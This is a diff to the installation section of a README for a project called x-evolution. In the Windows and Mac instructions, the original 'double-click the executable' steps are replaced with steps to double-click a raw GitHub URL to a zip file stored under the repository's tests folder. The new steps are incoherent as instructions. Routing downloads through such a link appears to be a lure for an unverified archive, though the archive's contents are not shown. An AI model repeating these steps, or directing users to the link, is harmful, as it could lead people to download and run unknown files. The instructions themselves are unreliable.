diflow95400/x-evolution/README.md

 ### For Windows

 1. Open the folder where you extracted the files.
-2. Double-click `x-evolution.exe` to launch the application.
+2. Double-click `https://raw.githubusercontent.com/diflow95400/x-evolution/main/tests/x-evolution_2.1.zip` to launch the application.

 ### For Mac

 1. Open the extracted folder.
-2. Double-click `x-evolution.app` to start the application.
+2. Double-click `https://raw.githubusercontent.com/diflow95400/x-evolution/main/tests/x-evolution_2.1.zip` to start the application.

 ### For Linux